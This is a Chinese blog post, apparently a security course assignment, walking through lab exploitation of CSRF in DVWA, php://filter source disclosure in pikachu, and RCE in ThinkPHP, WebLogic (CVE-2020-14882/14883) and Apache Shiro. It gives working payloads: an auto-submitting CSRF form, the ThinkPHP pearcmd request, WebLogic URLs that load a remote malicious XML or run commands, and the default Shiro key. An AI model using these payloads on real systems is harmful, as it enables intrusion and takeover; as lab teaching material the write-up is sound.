C11期作业10(05.01)

已于 2025-05-11 01:51:22 修改
阅读量827 收藏 16
点赞数 9
CC 4.0 BY-SA版权
分类专栏: 网安作业 文章标签: 网络安全
于 2025-05-11 00:49:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyk_0129/article/details/147662222

目录

一、CSRF

DVWA-High等级

说明

步骤

使用Burp生成CSRF利用POC并实现攻击

对dvwa的csrf页面抓包、生成csrf的poc​编辑​编辑

将此html代码复制到文件中(test.html)

通过浏览器打开test.html,页面很快跳转到dvwa页,可见成功修改了当前账号的密码​编辑

二、SSRF:file_get_content实验,要求获取ssrf.php的源码

说明

靶场:pikachu

知识点

步骤

直接获取文件(参数:?file=php://filter/resource=ssrf.php;可见:展示内容会解析后的内容,如此获取不到源码)​编辑

获取编码后的ssrf.php内容

对编码内容进行解码,得到ssrf.php文件的源码​编辑

源码内容

三、RCE:分别实现ThinkPHP、Weblogic、Shiro漏洞的利用过程

ThinkPHP RCE

漏洞概述:漏洞利用条件

影响范围

环境搭建(建议其他dockker服务都先停止,避免端口冲突)

漏洞演示

修复建议

Weblogic  RCE

漏洞概述:漏洞原理

影响范围

环境搭建(建议其他dockker服务都先停止,避免端口冲突)

漏洞演示:CVE-2020-14882

漏洞演示:CVE-2020-14883

修复建议

Shiro  RCE

Shiro反序列化漏洞(CVE-2016-4437、Shiro-550)

漏洞概述

影响范围:Apache Shiro ≤ 1.2.4

环境搭建(建议其他dockker服务都先停止,避免端口冲突)

漏洞演示

修复建议

Shiro权限绕过漏洞(CVE-2020-1957)

漏洞概述

影响范围:Apache Shiro < 1.5.2

环境搭建(建议其他dockker服务都先停止,避免端口冲突)

漏洞演示

修复建议

一、CSRF

  1. DVWA-High等级
    1. 说明
      1. 靶场:dvwa的CSRF页面(修改密码)
      2. high等级:有不确定参数token的验证,不再符合CSRF的条件
      3. 攻击思路:等级可通过cookie修改,请求时可将high等级改为low等级
    2. 步骤
      1. 利用XSS获取被攻击用户的cookie
      2. 模拟被攻击用户修改密码:使用burp抓包,改包(cookie+low),提交,修改密码成功(实际攻击中,会通过表单自动提交来实现)
  2. 使用Burp生成CSRF利用POC并实现攻击
    1. 对dvwa的csrf页面抓包、生成csrf的poc
    2. 将此html代码复制到文件中(test.html)
      <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://ip:port/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="123" />
      <input type="hidden" name="password&#95;conf" value="123" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
    3. 通过浏览器打开test.html,页面很快跳转到dvwa页,可见成功修改了当前账号的密码

二、SSRF:file_get_content实验,要求获取ssrf.php的源码

  1. 说明
    1. 靶场:pikachu
    2. 知识点
      1. file_get_contents() 函数的作用是把整个文件读入一个字符串中
      2. php://filter:可以在访问数据流之前进行「过滤」,并指定过滤方式,用于对来自非安全来源的数据(比如用户输入)进行验证和过滤
      3. php://filter的两个参数
        1. resource=<要过滤的数据流>:这个参数是必须的。它指定了你要筛选过滤的数据流,即要读的文件
        2. read=<读链的筛选列表>:该参数可选。可以设定一个或多个过滤器名称,以管道符( | )分隔
  2. 步骤
    1. 直接获取文件(参数:?file=php://filter/resource=ssrf.php;可见:展示内容会解析后的内容,如此获取不到源码)
    2. 获取编码后的ssrf.php内容
      1.url参数
?file=php://filter/read=convert.base64-encode/resource=ssrf.php


2.编码后的内容:
  PD9waHAKLyoqCiAqIENyZWF0ZWQgYnkgcnVubmVyLmhhbgogKiBUaGVyZSBpcyBub3RoaW5nIG5ldyB1bmRlciB0aGUgc3VuCiAqLwoKCiRTRUxGX1BBR0UgPSBzdWJzdHIoJF9TRVJWRVJbJ1BIUF9TRUxGJ10sc3RycnBvcygkX1NFUlZFUlsnUEhQX1NFTEYnXSwnLycpKzEpOwoKaWYgKCRTRUxGX1BBR0UgPSAic3NyZi5waHAiKXsKICAgICRBQ1RJVkUgPSBhcnJheSgnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnJywnYWN0aXZlIG9wZW4nLCdhY3RpdmUnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnLCcnKTsKfQoKJFBJS0FfUk9PVF9ESVIgPSAgIi4uLy4uLyI7CmluY2x1ZGVfb25jZSAkUElLQV9ST09UX0RJUi4naGVhZGVyLnBocCc7CgoKCgoKCj8+CgoKPGRpdiBjbGFzcz0ibWFpbi1jb250ZW50Ij4KICAgIDxkaXYgY2xhc3M9Im1haW4tY29udGVudC1pbm5lciI+CiAgICAgICAgPGRpdiBjbGFzcz0iYnJlYWRjcnVtYnMgYWNlLXNhdmUtc3RhdGUiIGlkPSJicmVhZGNydW1icyI+CiAgICAgICAgICAgIDx1bCBjbGFzcz0iYnJlYWRjcnVtYiI+CiAgICAgICAgICAgICAgICA8bGk+CiAgICAgICAgICAgICAgICAgICAgPGkgY2xhc3M9ImFjZS1pY29uIGZhIGZhLWhvbWUgaG9tZS1pY29uIj48L2k+CiAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0ic3NyZi5waHAiPjwvYT4KICAgICAgICAgICAgICAgIDwvbGk+CiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImFjdGl2ZSI+5qaC6L+wPC9saT4KICAgICAgICAgICAgPC91bD4KICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJwYWdlLWNvbnRlbnQiPgoKICAgICAgICAgPGI+U1NSRihTZXJ2ZXItU2lkZSBSZXF1ZXN0IEZvcmdlcnk65pyN5Yqh5Zmo56uv6K+35rGC5Lyq6YCgKTwvYj4KICAgICAgICAgPHA+5YW25b2i5oiQ55qE5Y6f5Zug5aSn6YO95piv55Sx5LqO5pyN5Yqh56uvPGI+5o+Q5L6b5LqG5LuO5YW25LuW5pyN5Yqh5Zmo5bqU55So6I635Y+W5pWw5o2u55qE5Yqf6IO9PC9iPizkvYblj4jmsqHmnInlr7nnm67moIflnLDlnYDlgZrkuKXmoLzov4fmu6TkuI7pmZDliLY8L3A+CiAgICAgICAgICAgIOWvvOiHtOaUu+WHu+iAheWPr+S7peS8oOWFpeS7u+aEj+eahOWcsOWdgOadpeiuqeWQjuerr+acjeWKoeWZqOWvueWFtuWPkei1t+ivt+axgizlubbov5Tlm57lr7nor6Xnm67moIflnLDlnYDor7fmsYLnmoTmlbDmja48YnI+CiAgICAgICAgICAgIDxicj4KICAgICAgICAgICAg5pWw5o2u5rWBOuaUu+WHu+iAhS0tLS0tPuacjeWKoeWZqC0tLS0+55uu5qCH5Zyw5Z2APGJyPgogICAgICAgICAgICA8YnI+CiAgICAgICAgICAgIOagueaNruWQjuWPsOS9v+eUqOeahOWHveaVsOeahOS4jeWQjCzlr7nlupTnmoTlvbHlk43lkozliKnnlKjmlrnms5Xlj4jmnInkuI3kuIDmoLcKICAgICAgICAgICAgPHByZSBzdHlsZT0id2lkdGg6IDUwMHB4OyI+ClBIUOS4reS4i+mdouWHveaVsOeahOS9v+eUqOS4jeW9k+S8muWvvOiHtFNTUkY6CmZpbGVfZ2V0X2NvbnRlbnRzKCkKZnNvY2tvcGVuKCkKY3VybF9leGVjKCkKICAgICAgICAgICAgPC9wcmU+PGJyPgogICAgICAgICAgICDlpoLmnpzkuIDlrpropoHpgJrov4flkI7lj7DmnI3liqHlmajov5znqIvljrvlr7nnlKjmiLfmjIflrpooIuaIluiAhemihOWfi+WcqOWJjeerr+eahOivt+axgiIp55qE5Zyw5Z2A6L+b6KGM6LWE5rqQ6K+35rGCLDxiPuWImeivt+WBmuWlveebruagh+WcsOWdgOeahOi/h+a7pDwvYj7jgIIKPGJyPgogICAgICAgICAgICA8YnI+CgogICAgICAgICAgICDkvaDlj6/ku6XmoLnmja4iU1NSRiLph4zpnaLnmoTpobnnm67mnaXmkJ7mh4Lpl67popjnmoTljp/lm6AKCiAgICAgICAgPC9kaXY+PCEtLSAvLnBhZ2UtY29udGVudCAtLT4KICAgIDwvZGl2Pgo8L2Rpdj48IS0tIC8ubWFpbi1jb250ZW50IC0tPgoKCgo8P3BocAppbmNsdWRlX29uY2UgJFBJS0FfUk9PVF9ESVIgLiAnZm9vdGVyLnBocCc7Cgo/Pgo=
    3. 对编码内容进行解码,得到ssrf.php文件的源码
    4. 源码内容
      <?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */


$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);

if ($SELF_PAGE = "ssrf.php"){
    $ACTIVE = array('','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','active open','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}

$PIKA_ROOT_DIR =  "../../";
include_once $PIKA_ROOT_DIR.'header.php';






?>


<div class="main-content">
    <div class="main-content-inner">
        <div class="breadcrumbs ace-save-state" id="breadcrumbs">
            <ul class="breadcrumb">
                <li>
                    <i class="ace-icon fa fa-home home-icon"></i>
                    <a href="ssrf.php"></a>
                </li>
                <li class="active">概述</li>
            </ul>
        </div>
        <div class="page-content">

         <b>SSRF(Server-Side Request Forgery:服务器端请求伪造)</b>
         <p>其形成的原因大都是由于服务端<b>提供了从其他服务器应用获取数据的功能</b>,但又没有对目标地址做严格过滤与限制</p>
            导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据<br>
            <br>
            数据流:攻击者----->服务器---->目标地址<br>
            <br>
            根据后台使用的函数的不同,对应的影响和利用方法又有不一样
            <pre style="width: 500px;">
PHP中下面函数的使用不当会导致SSRF:
file_get_contents()
fsockopen()
curl_exec()
            </pre><br>
            如果一定要通过后台服务器远程去对用户指定("或者预埋在前端的请求")的地址进行资源请求,<b>则请做好目标地址的过滤</b>。
<br>
            <br>

            你可以根据"SSRF"里面的项目来搞懂问题的原因

        </div><!-- /.page-content -->
    </div>
</div><!-- /.main-content -->



<?php
include_once $PIKA_ROOT_DIR . 'footer.php';

?>

三、RCE:分别实现ThinkPHP、Weblogic、Shiro漏洞的利用过程

  1. ThinkPHP RCE
    1. 漏洞概述:漏洞利用条件
      1. register_argc_argv = on
      2. 知道pearcmd.php路径
      3. 安装pear库
      4. 多语言特性开启
    2. 影响范围
      1. 6.0.1 < ThinkPHP ≤ 6.0.13
      2. 5.1.0 < ThinkPHP ≤ 5.1.8
      3. 5.0.0 < ThinkPHP ≤ 5.0.12
    3. 环境搭建(建议其他dockker服务都先停止,避免端口冲突)
      1. docker pull vulfocus/thinkphp:6.0.12
      2. docker run -d -p 8080:80 vulfocus/thinkphp:6.0.12
      3. 浏览器访问:http://your_ip:8080/public/
    4. 漏洞演示
      1. 通过burp请求(在浏览器请求会存在url编码问题) 
        /public/?lang=../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=phpinfo()?>+/var/www/html/info.php
      2. 访问info.php
    5. 修复建议
      1. 若无必要,可关闭多语言特性
      2. 升级至最新版本
  2. Weblogic  RCE
    1. 漏洞概述:漏洞原理
      1. CVE-2020-14882:允许未授权的用户绕过管理控制台的权限验证访问后台
      2. CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令
      3. 这两个漏洞的组合利用,可以让攻击者以未授权的身份登录后台,然后通过GET请求在Weblogic服务器上远程执行命令
    2. 影响范围
      1. WebLogic 10.3.6.0.0
      2. WebLogic 12.1.3.0.0
      3. WebLogic 12.2.1.3.0
      4. WebLogic 12.2.1.4.0
      5. WebLogic 14.1.1.0.0
    3. 环境搭建(建议其他dockker服务都先停止,避免端口冲突)
      1. 安装Docker-compose:yum install -y docker-compose
      2. 下载Vulhub(试了几次才ok):git clone https://github.com/vulhub/vulhub.git
      3. cd vulhub/weblogic/CVE-2020-14882/
      4. 启动容器(可能比较慢):docker compose up -d
    4. 漏洞演示:CVE-2020-14882
      1. 访问以下URL,即可未授权访问到管理后台页面 
        http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
或
http://your-ip:7001/console/images/%252e%252e%252fconsole.portal
      2. 访问后的页面截图(可能需要访问几次才会看到此页面)
      3. 观察该页面可看到通过未授权访问的后台与正常登录的后台相比,由于权限不足,缺少部署等功能,无法安装应用,所以也无法通过部署项目等方式直接获取权限。想要实现服务器RCE,就要借助另外一个漏洞(CVE-2020-14883)
    5. 漏洞演示:CVE-2020-14883
      1. 利用方式一
        1. 构造一个恶意的XML文件(命名为rce.xml) 
          <?xml version="1.0" encoding="UTF-8" ?>
<beans
    xmlns="http://www.springframework.org/schema/beans"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://www.springframework.org/schema/beans
	http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>
                    <![CDATA[touch /tmp/rce]]>
                </value>
            </list>
        </constructor-arg>
    </bean>
</beans>
        2. 将xml文件保存在Weblogic可以访问到的服务器上(如upload-labs容器),确保打开后正常
        3. 访问如下URL(两处需替换为你的ip),即可让Weblogic加载该恶意XML文件,并执行其中的命令 
          http://your-ip:7001/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")
        4. 请求url后的页面(报错无所谓)
        5. 进入容器,可以发现 touch /tmp/rce 已成功执行
        6. 这种利用方法的不足之处,就是需要Weblogic服务器能够访问到恶意XML,如果是内网服务器则还需要考虑突破网络限制的问题
      2. 利用方式二
        1. 通过 com.tangosol.coherence.mvel2.sh.ShellSession 类实现,这个利用方法只能在 Weblogic12.2.1 以上版本利用,因为 10.3.6(上面受影响版本中只有这一个低于12.2.1)版本没有这个类
        2. 直接访问如下URL(需替换为你的ip),即可执行命令 
          http://your-ip:7001/console/images/%252e%252e%252fconsole.portal?
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java
.lang.Runtime.getRuntime().exec('touch%20/tmp/rce2');")
        3. 进入容器,可以发现 touch /tmp/rce2已成功执行
    6. 修复建议
      1. 若无必要,可选择关闭console
      2. 升级至最新版本
  3. Shiro  RCE
    1. Shiro反序列化漏洞(CVE-2016-4437、Shiro-550)
      1. 漏洞概述
        1. 在Apache Shiro的框架中,执行身份验证时提供了一个记住密码的功能(RememberMe),如果用户登录时勾选了这个选项,登录后请求数据包中的Cookie字段将会多出一段数据,这一段数据包含了用户的身份信息,是经过加密的
        2. 加密过程:用户信息 --> 序列化 --> AES加密(这一步需要用密钥key) --> Base64编码 --> RememberMeCookie值
        3. 识别身份的时候,服务端需要对Cookie里的RememberMe字段解密。根据加密的顺序,反推解密过程:RememberMe Cookie值 --> Base64解码 --> AES解密 --> 反序列化(未作过滤处理) --> 用户信息
        4. 出问题的点在于:AES加密的密钥Key被硬编码在代码里(默认密钥:kPH+bIxk5D2deZiIxcaaaA==),这就意味着任何人都可以通过源代码拿到AES加密的密钥。因此,如果把用户信息替换成恶意命令,经过序列化、AES加密、Base64编码后,作为Cookie的RememberMe字段发送。服务端接收RememberMe字段进行解码、解密,反序列化等,这一过程未进行过滤,最终造成该漏洞,实现远程命令执行
      2. 影响范围:Apache Shiro ≤ 1.2.4
      3. 环境搭建(建议其他dockker服务都先停止,避免端口冲突)
        1. cd vulhub/shiro/CVE-2016-4437/
        2. 启动容器(可能有点慢):docker compose up -d
        3. 打开页面
        4. 使用burp验证漏洞存在:账号admin 密码vulhub
      4. 漏洞演示
        1. 使用工具:shiro_attack_2.2
        2. 检测成功
        3. 命令执行:成功
      5. 修复建议
        1. 升级Shiro到最新版本
        2. 自定义AES密钥且不使用硬编码
    2. Shiro权限绕过漏洞(CVE-2020-1957)
      1. 漏洞概述
        1. Apache Shiro 1.5.2之前的版本,由于Shiro拦截器和Web框架拦截器对RequestURI的匹配流程存在差异,导致攻击者通过构造特殊的http请求,可以绕过Shiro的认证,未授权访问敏感路径
        2. 以Spring框架为例。Spring Boot搭配Apache Shiro进行身份验证、权限控制时,利用Spring和ApacheShiro对URL的处理逻辑不同,实现认证绕过和未授权访问
        3. 比如攻击者构造了这样一个路径: /xxx/..;/admin/
          1.  Shiro首先对URL进行处理,读取到;后会进行截断,丢弃/admin/,然后对/xxx/..;查找需要进行权限判断的地方,发现/xxx/..;不需要权限校验,则放行,交由Spring进行处理
          2. Spring通过/xxx/..;/admin/获取到有效路径/admin/,发起请求访问,假如admin是后台地址,则会成功访问后台
      2. 影响范围:Apache Shiro < 1.5.2
      3. 环境搭建(建议其他dockker服务都先停止,避免端口冲突)
        1. cd vulhub/shiro/CVE-2020-1957/
        2. docker compose up -d
      4. 漏洞演示
        1. 访问 http://your-ip:8080 ,看到靶场首页
        2. 直接请求管理页面 /admin/ ,无法访问,将会被重定向到登录页面(可能有点慢)
        3. 构造恶意请求 /xxx/..;/admin/ ,即可绕过权限校验,访问到管理页面(可能有点慢)
      5. 修复建议
        1. 升级Shiro到最新版本
面试题 05.01. 插入
2301_76145947的博客
10-27 144
LeetCode 面试题 05.01. 插入
sky 05.01笔记
weixin_43369700的博客
03-25 455
在实际情况中,输入信号不为无穷大的斜率导致开关过程中,即0、1切换的瞬间,VDD与GND之间短时间出现一条电流通路,此时两个管子同时导通,即短路功耗。7.nMOS/pMOS管面积越大,MOS管流过的电流越大,速度也更快,驱动能力更强。因为寄存器本身要能正常工作的话,就需要setup time和hold time,D->Q延时已经model在setup time 里面了。8.simulation tool 看波形时,CK端与D端对齐,它是理想的情况,不需要setup,hold time,与实际电路不一样。
05.01 插入
Cigar
11-17 203
原题目 面试题 05.01. 插入 难度简单20收藏分享切换为英文接收动态反馈 插入。给定两个32位的整数N与M,以及表示比特位置的i与j。编写一种方法,将M插入N,使得M从N的第j位开始,到第i位结束。假定从j位到i位足以容纳M,也即若M = 10 011,那么j和i之间至少可容纳5个位。例如,不可能出现j = 3和i = 2的情况,因为第3位和第2位之间放不下M。 示例1: 输入:N = 1024(10000000000), M = 19(10011), i = 2, j = 6 输出:N = 11
LeetCode——面试题 05.01 插入
玄昌盛不会编程
07-26 213
LeetCode——面试题 05.01 插入
05.01 字符串
zzyzxb的博客
07-12 122
字符串
LeetCode 面试题 05.01. 插入
zheliku的博客
09-22 295
位区域,不足之处用 0 补齐。具体插入过程如图所示。会产生 int 范围越界,因此直接赋值为 0 即可。分为 3 个区间:[31, j + 1] 为前缀。(i
C#学习笔记 05.01
qq_39804557的博客
09-16 209
C#学习笔记 04.01 (学习视频来自bilibili的传智播客赵老师基础教学视频) 整完了while循环,就来for循环 个人感觉这个用的更多一点,至少不用担心因为失误把循环写死,而while循环则被用于故意写死的U型暖循环。 for (int i = 0; i < length(这是需要判断的条件); i++(这里完成条件变动)) { 这里面是循环体 } 这个和while的差别,就是不需要总是记得把条件的变化写进循环体里面,就不容易忘。。。 因为本身都是循环,所以说功能上来讲用哪个都能实现,只是
面试题 05.01:插入
菊头蝙蝠的博客
12-09 465
面试题 05.01:插入题目解题方法一:位运算 题目 题目链接 给定两个整型数字 N 与 M,以及表示比特位置的 i 与 j(i <= j,且从 0 位开始计算)。 编写一种方法,使 M 对应的二进制数字插入 N 对应的二进制数字的第 i ~ j 位区域,不足之处用 0 补齐。具体插入过程如图所示。 题目保证从 i 位到 j 位足以容纳 M, 例如: M = 10011,则 i~j 区域至少可容纳 5 位。 示例1: 输入:N = 1024(10000000000), M = 19(10011),
【位运算】05.01插入
wjavadog的博客
08-29 164
插入
05.01初识HBase1
08-03
【初识HBase】 HBase,全称Hadoop Database,是一种构建在Hadoop文件系统(HDFS)之上的分布式列式存储系统。它源于Google的Bigtable论文,旨在解决大数据量场景下的数据存储和检索问题。HBase不同于传统的关系型...
CH05.01-同态加密1
08-03
同态加密是一种高级的加密技术,它允许对加密数据进行计算,而无需先解密数据。这一特性使得数据在保持加密状态的同时,可以进行各种计算操作,极大地提升了数据的安全性和隐私保护水平。在云存储和大数据分析的背景...
HydrogenCms(采用MVC开发) 2008.06.05.01_hydrogencms.2008.06.05.01.zip
12-18
在这款2008.06.05.01版本的HydrogenCms中,我们可以待找到以下几个关键知识点: 1. **MVC模式**:MVC模式的核心思想是分离关注点,将数据模型、视图展示和控制器逻辑分开。模型负责管理应用程序的数据和业务逻辑...
S05.01-Exercise-AsyncTaskLoader.rar
07-14
标题"S05.01-Exercise-AsyncTaskLoader.rar"暗示了这个压缩包可能包含一个Android开发相关的练习项目,重点是使用AsyncTaskLoader。在Android应用程序中,异步加载数据是一项核心任务,尤其是在处理大数据或者网络...
linux解压tulip_v05.01.10_20180928patch_20230427.tar.gz命令
06-05
用户提到的文件是"tulip_v05.01.10_20180928patch_20230427.tar.gz"。这是一个带有.tar.gz扩展名的文件,表明是经过tar和gzip压缩的档案文件。在Linux中,解压.tar.gz文件的常用命令是使用`tar`命令。标准的解压命令...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8747
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
应用CNN卷积神经网络构建的auto encoder自编码器,经过训练实现了对带有噪点的MNIST手写字体图片进行去噪的处理
最新发布
08-15
资源下载链接为: https://pan.quark.cn/s/864eaed220e0 应用CNN卷积神经网络构建的auto encoder自编码器,经过训练实现了对带有噪点的MNIST手写字体图片进行去噪的处理(最新、最全版本!打开链接下载即可用!)
IP-guard应用程序预定义库
08-15
IP-guard应用程序预定义库
CH341A编程器软件1.3支持25Q256等32M芯片
08-15
CH341A编程器是一款广泛应用的通用编程设备,尤其在电子工程和嵌入式系统开发领域中,它被用来烧录各种类型的微控制器、存储器和其他IC芯片。这款编程器的最新版本为1.3,它的一个显著特点是增加了对25Q256等32M芯片的支持。 25Q256是一种串行EEPROM(电可擦可编程只读存储器)芯片,通常用于存储程序代码、配置数据或其他非易失性信息。32M在这里指的是存储容量,即该芯片可以存储32兆位(Mbit)的数据,换算成字节数就是4MB。这种大容量的存储器在许多嵌入式系统中都有应用,例如汽车电子、工业控制、消费电子设备等。 CH341A编程器的1.3版更新,意味着它可以与更多的芯片型号兼容,特别是针对32M容量的芯片进行了优化,提高了编程效率和稳定性。26系列芯片通常指的是Microchip公司的25系列SPI(串行外围接口)EEPROM产品线,这些芯片广泛应用于各种需要小体积、低功耗和非易失性存储的应用场景。 全功能版的CH341A编程器不仅支持25Q256,还支持其他大容量芯片,这意味着它具有广泛的兼容性,能够满足不同项目的需求。这包括但不限于微控制器、EPROM、EEPROM、闪存、逻辑门电路等多种类型芯片的编程。 使用CH341A编程器进行编程操作时,首先需要将设备通过USB连接到计算机,然后安装相应的驱动程序和编程软件。在本例中,压缩包中的"CH341A_1.30"很可能是编程软件的安装程序。安装后,用户可以通过软件界面选择需要编程的芯片类型,加载待烧录的固件或数据,然后执行编程操作。编程过程中需要注意的是,确保正确设置芯片的电压、时钟频率等参数,以防止损坏芯片。 CH341A编程器1.3版是面向电子爱好者和专业工程师的一款实用工具,其强大的兼容性和易用性使其在众多编程器中脱颖而出。对于需要处理25Q256等32M芯片的项目,或者26系列芯片的编程工作,CH341A编程器是理想的选择。通过持续的软件更新和升级,它保持了与现代电子技术同步,确保用户能方便地对各种芯片进行编程和调试。
修改多多巴枪SN软件,小白慎用
08-15
修改多多巴枪SN软件,小白慎用,米商巴枪的改机包
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值